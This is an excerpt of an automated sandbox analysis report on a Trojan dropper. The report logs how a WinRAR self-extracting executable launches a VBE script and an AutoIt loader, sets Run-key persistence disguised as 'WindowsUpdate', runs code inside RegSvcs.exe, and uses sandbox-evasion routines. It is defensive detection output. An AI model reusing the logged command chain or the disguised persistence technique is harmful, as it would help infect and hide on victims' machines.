                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: String function: 009B6630 appears 31 times
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: String function: 009B57A5 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: String function: 00BDFD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: String function: 00BE0DC0 appears 46 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506337975.000000000558F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exe, 00000000.00000003.1504703336.000000000558E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.evad.winEXE@28/48@0/0
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_0099932C GetLastError,FormatMessageW,_wcslen,LocalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CB194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CB1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C2194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00C21F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CC5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CBDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CD4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009AEBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe File created: C:\Users\user~1\AppData\Local\Temp\RarSFX0
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Command line argument: sfxname 0_2_009B454A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Command line argument: sfxstime 0_2_009B454A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Command line argument: STARTDLG 0_2_009B454A
                Source: uhbrQkYNzx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe File read: C:\Windows\win.ini
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: uhbrQkYNzx.exe ReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe File read: C:\Users\user\Desktop\uhbrQkYNzx.exe
                Source: unknown Process created: C:\Users\user\Desktop\uhbrQkYNzx.exe "C:\Users\user\Desktop\uhbrQkYNzx.exe"
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc tguujh.msc nhhjmppg.dll
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknown Process created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe "C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: dxgidebug.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: dwmapi.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: riched20.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: usp10.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: msls31.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: policymanager.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: msvcp110_win.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: pcacli.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: ntshrui.dll
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Section loaded: cscapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: uhbrQkYNzx.exeStatic file information: File size 1264257 > 1048576
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: uhbrQkYNzx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: uhbrQkYNzx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uhbrQkYNzx.exe
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2027782014.0000000000E60000.00000040.00001000.00020000.00000000.sdmp
                Source: uhbrQkYNzx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: uhbrQkYNzx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: uhbrQkYNzx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: uhbrQkYNzx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: uhbrQkYNzx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00C55D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00C55D78
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4847500
                Source: uhbrQkYNzx.exe	Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_009B6680 push ecx; ret 0_2_009B6693
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Code function: 0_2_009B5773 push ecx; ret 0_2_009B5786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CA0332 push edi; ret 10_2_00CA0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00C70E06 push ecx; ret 10_2_00C70E19
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00C6DC00 push eax; iretd 10_2_00C6DC01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0040D17A push ds; retf 15_2_0040D17B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_004052D2 push ebx; ret 15_2_004052D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00417A9B push cs; iretd 15_2_00417A9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00403440 push eax; ret 15_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0041EE60 push ebx; iretd 15_2_0041EE69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00414E3E push 00000056h; retf 15_2_00414E47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E6225F pushad ; ret 15_2_00E627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E627FA pushad ; ret 15_2_00E627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E6283D push eax; iretd 15_2_00E62858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E909AD push ecx; mov dword ptr [esp], ecx 15_2_00E909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E61368 push eax; iretd 15_2_00E61369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00E69939 push es; iretd 15_2_00E69940
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C10332 push edi; ret 16_2_00C10333
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00BE0E06 push ecx; ret 16_2_00BE0E19

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	File created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	File created: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe.exe

                Boot Survival

                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00CE25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00CE25A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Code function: 10_2_00C6FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00C6FC8A
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00C525A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00C525A0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Code function: 16_2_00BDFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00BDFC8A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                Source: Yara match	File source: Process Memory Space: tguujh.msc PID: 2056, type: MEMORYSTR
                Source: Yara match	File source: Process Memory Space: tguujh.msc.exe PID: 5748, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
